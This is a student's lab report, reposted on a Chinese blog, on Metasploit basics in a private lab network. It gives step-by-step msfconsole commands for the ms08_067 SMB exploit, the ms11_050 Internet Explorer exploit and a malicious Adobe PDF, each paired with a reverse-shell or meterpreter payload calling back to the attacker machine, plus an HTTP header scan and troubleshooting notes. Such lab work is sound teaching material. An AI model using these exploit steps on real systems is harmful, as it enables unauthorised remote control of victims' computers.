2018-2019 20165208 网络对抗 Exp5 MSF基础

2018-2019 20165208 网络对抗 Exp5 MSF基础

实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

1.5 报告评分(1分)

基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit:指由攻击者利用安全漏洞,将负责攻击的代码payload传送到靶机中。
  • payload:是target在被渗透攻击之后去执行的恶意代码,如ex1的shellcode。
  • encode:进行编码改变payload形态,使其不出现特定字符。

实践过程记录

1.一个主动攻击实践,如ms08_067;

 ①攻击机:kali IP:192.168.119.128
 
②靶机:windows XP SP3(English) IP:192.168.119.129(失败)

②靶机:windows 2000 Professional(English) IP:192.168.119.130(成功)
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    • msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞,use后其实是漏洞所在目录路径名
    • msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷
    • msf exploit(ms08_067_netapi) > set payload
    • generic/shell_reverse_tcp //tcp反向回连
    • msf exploit(ms08_067_netapi) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(ms08_067_netapi) > set LPORT 5208 //攻击端口
    • msf exploit(ms08_067_netapi) > set RHOST 192.168.119.129 //靶机ip,特定漏洞端口已经固定
    • msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
    • msf exploit(ms08_067_netapi) > exploit //攻击
  • 建立会话,攻击失败显示如下:
    1283587-20190412191048509-1941599669.png

  • 通过网上查找资料,发现可能是打过补丁的原因,更换虚拟机。
  • 选择靶机windows 2000 Professional(English)。
  • 按上述命令进行操作,记得更换IP。
    1283587-20190412191309539-289094698.png

  • 显示监听成功,dir命令成功。
    1283587-20190412191339685-765176662.png

2. 一个针对浏览器的攻击,如ms11_050;

①攻击机:kali IP:192.168.119.128

②靶机:windows 7 x64 IP:192.168.119.131 IE:8.0(失败)

②靶机:windows Sever 2008  IP:192.168.119.132(成功)
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
    • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(ms11_050_cobjectelement) > set LPORT 5208 //攻击端口固定
    • msf exploit(ms11_050_cobjectelement) > set URIPATH 5208ky //统一资源标识符路径设置
    • msf exploit(ms11_050_cobjectelement) > exploit
  • 运行靶机浏览器,这时win7出现DNS服务器未响应,尝试解决无果后,更换了虚拟机。
    1283587-20190412191532770-132957560.png

  • 操作同上
    1283587-20190412191508237-1219067983.png

  • 在访问http://192.168.119.128:8080/5208ky时,可见攻击机出现访问信息。
    1283587-20190412192300816-258020090.png
    1283587-20190412191439499-1282713634.png

3. 一个针对客户端的攻击,如Adobe;

①攻击机:kali IP:192.168.119.128

②靶机:windows XP sp2 IP:192.168.119.133 

Adobe:9.3
  • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • `msf > use windows/fileformat/adobe_cooltype_sing
    • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连
    • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(adobe_cooltype_sing) > set LPORT 5208 //攻击端口
    • msf exploit(adobe_cooltype_sing) > set FILENAME 20165208.pdf //设置生成pdf文件的名字
    • msf exploit(adobe_cooltype_sing) > exploit //攻击
  • 成功生成20165208.pdf。
    1283587-20190412192328471-593978924.png

  • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    • msf > use exploit/multi/handler //进入监听模块
    • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    • msf exploit(handler) > set LHOST 192.168.119.128 //攻击机ip
    • msf exploit(handler) > set LPORT 5208 //攻击端口固定
    • msf exploit(handler) > exploit
  • 然后在靶机上打开20165208.pdf文件。
    1283587-20190412192336175-639781367.png

  • kali连接成功。
    1283587-20190412192409787-1265976616.png

  • 攻击机运行ipconfig命令,可显示靶机IP地址。
    1283587-20190412192427184-1412514885.png

  • 靶机关闭pdf文件,则失去权限。
    1283587-20190412192429872-634128314.png

4. 成功应用任何一个辅助模块(scanner/http/http_header 唯一)

  • 使用命令msf > show auxiliary查看所有的辅助模块
    1283587-20190412192540611-1269331746.png

  • 在看的时候我试了几个,因为好多命令的描述我不能准确的定位到它功能,最后我选择了scanner/http/http_header
  • info scanner/http/http_header查看命令相关信息。
    1283587-20190412192556590-363893429.png

  • 我们可以看到它的描述: This module shows HTTP Headers returned by the scanned systems。我最初以为它是给我返回浏览器的头部信息,也就是可以监听对方访问网页浏览的是什么。
  • 实际操作:首先use scanner/http/http_header调用模块,然后根据info得出的参数信息对参数进行设定

use scanner/http/http_header
set RHOSTS 192.168.119.132
RHOSTS => 192.168.119.132
set HTTP_METHOD GET
set RPORT 8080
exploit

set RPORT 80
exploit

1283587-20190412192614687-2000169655.png

  • 在端口80监听时我们可以看到返回信息Microsoft-IIS/7.0
  • 可以得出结论:目标计算机80端口上运行着IIS 7.0,

而在历年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影响的漏洞数居前四位。同时我们可以大概根据IIS 7.0 判断出它的操作系统版本为Win 200或Vista全系列 。这和我们的靶机系统也是匹配的。

IIS版本系统版本受影响漏洞数量
IIS 5.0Windows 200010
IIS 5.1Windows XP 系列16
IIS 7.0Win 2008、Vista全系列11
IIS 10.0Win 10和Win 20162

实验中遇到的问题及解决方法

1.问题:在主动攻击实践时,操作完exploit后显示 Exploit completed, but no session was created.
1283587-20190412192632305-791354998.png

查了资料后我做了以下几个修改尝试:

我最初设的target参数是0,即自动选择目标系统类型。在尝试解决时我选了设为6。想说会不会这样的匹配度更合适,失败了。
1283587-20190412192638830-2095943143.png
1283587-20190412192701976-7326635.png

后来找到过程中看到有说可能是系统打了补丁,使攻击难以进行。所以就选择更换了虚拟机。
1283587-20190412192707780-731406920.png
1283587-20190412192726539-471346445.png

2.问题:在进行针对浏览器的攻击时,靶机显示无法显示该网页。进行诊断后提示是DNS服务器未响应。
1283587-20190412192748674-220076912.png

根据网络诊断提示DNS服务器未响应,我进行了三种尝试,分别如下:
1283587-20190412192803554-1262804082.png
1283587-20190412192807232-1009032755.png
1283587-20190412192810512-2074192060.png

不过,so sad,失败了,最后选择更换为win 2008虚拟机。

离实战还缺些什么技术或步骤?

现在的操作限定条件较多,对靶机,对版本,对补丁都多有要求,而对于更接近现实的攻击情况而言,自己的能力还有限,对于代码编写类的依赖已有教程的情况比较多,也就决定了攻击可能已经被破解,从而达不到既定的要求。

实验感想

本次实验对MSF做了简单的试操作,在找到合适的虚拟机后实验还是相对清晰、简单的。在这个过程中,学会查找很主要,infoshow targetsshow payloads等命令都帮了我不少忙。在整个实验中第四个模块是我独立完成的,网络上有关我选的这个命令的直接使用教程还是蛮少的,但是可以发现很多其他的例子。举一反三,怀着未知的忐忑去尝试成功后还是蛮有成就感的。

转载于:https://www.cnblogs.com/KY-high/p/10698062.html

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值